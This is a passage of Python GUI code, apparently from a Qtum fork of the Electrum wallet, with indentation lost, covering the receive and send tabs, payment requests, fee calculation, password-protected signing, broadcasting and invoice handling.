btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(BLUE_FG)
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(BLUE_FG)
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance") + ": %s " % (self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]" % (self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]" % (self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.token_balance_list.update()
self.token_hist_list.update()
self.smart_contract_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return self.create_list_tab(l, l.create_toolbar())
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _(
'Qtum address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Qtum addresses.'),
_('The Qtum address never expires and will always be part of this wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n' \
+ _(
'You may enter a QTUM address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Qtum address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _(
'Qtum transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n' \
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n' \
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
self.rbf_checkbox = QCheckBox(_('Replaceable'))
msg = [_('If you check this box, your transaction will be marked as non-final,'),
_('and you will have the possiblity, while it is unconfirmed, to replace it with a transaction that pays a higher fee.'),
_('Note that some merchants do not accept non-final transactions until they are confirmed.')]
self.rbf_checkbox.setToolTip('<p>' + ' '.join(msg) + '</p>')
self.rbf_checkbox.setVisible(False)
grid.addWidget(self.fee_e_label, 5, 0)
grid.addWidget(self.fee_slider, 5, 1)
grid.addWidget(self.fee_e, 5, 2)
grid.addWidget(self.rbf_checkbox, 5, 3)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = RED_FG, RED_FG
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = BLACK_FG, BLACK_FG
elif self.amount_e.isModified():
amt_color, fee_color = BLACK_FG, BLUE_FG
else:
amt_color, fee_color = BLUE_FG, BLUE_FG
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color)
self.fee_e.setStyleSheet(fee_color)
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee,
is_sweep=is_sweep)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is None:
return
rbf_policy = self.config.get('rbf_policy', 1)
if rbf_policy == 0:
b = True
elif rbf_policy == 1:
fee_rate = fee * 1000 / tx.estimated_size()
try:
c = self.config.reverse_dynfee(fee_rate)
b = c in [-1, 25]
except:
b = False
elif rbf_policy == 2:
b = False
self.rbf_checkbox.setVisible(b)
self.rbf_checkbox.setChecked(b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.'%alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Qtum Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Qtum Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins()
return outputs, fee, label, coins
def do_preview(self):
self.do_send(preview=True)
def do_send(self, preview=False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee, is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.rbf_checkbox.isChecked()
tx.set_rbf(use_rbf)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid qtum URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.set_pay_from([])
self.rbf_checkbox.setChecked(False)
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
toolbar.setContentsMargins(1, 0, 1, 6)
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l, l.create_toolbar(visible=True))
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_smart_contract_tab(self):
from .smart_contract_list import SmartContractList
self.smart_contract_list = l = SmartContractList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.need_update.set()
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
